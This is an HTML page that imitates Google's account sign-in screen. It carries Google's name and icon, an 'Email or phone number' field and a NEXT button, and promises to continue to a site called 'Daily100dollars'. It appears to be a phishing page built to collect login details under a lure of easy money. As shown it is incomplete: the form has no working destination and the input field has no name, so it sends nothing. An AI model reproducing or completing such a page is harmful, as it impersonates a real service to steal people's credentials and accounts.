<!DOCTYPE html>
<html>
<head>
	<title>Sign in-Google Accounts</title>
</head>
<link rel="icon" href="img/google_icon.png" type="image/png">
<meta charset="utf-8">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
  
  <style>
.button {
    background-color: DodgerBlue;
    border: none;
    color: white;
    padding: 15px 32px;
    text-align: center;
    text-decoration: none;
    display: inline-block;
    font-size: 12px;
    margin: 12px 2px;
    cursor: pointer;
    border-radius: 5px;	

}
p.ex1{
	border:1px;

}
</style>
<body>
  <br>
  <br>
	<div class="container">
<p><img src="img/google_icon.png" height="16" width="16"> Sign in with Google</p>
<h1>Sign in</h1>
<br>
<p>to continue to <a href="#">Daily100dollars</a></p>
<form action="post" >
	
<h6 style="color:blue">Email or phone number</h6>
<input class="input" type="text" name="">
<br>
<a href="">Forget email?</a>
<br>
<a href="">Create accounts</a>
<button class="btn btn-primary"  style=" background-color: DodgerBlue" type="submit">NEXT</button>
</form>
	</div>
</body>
</html>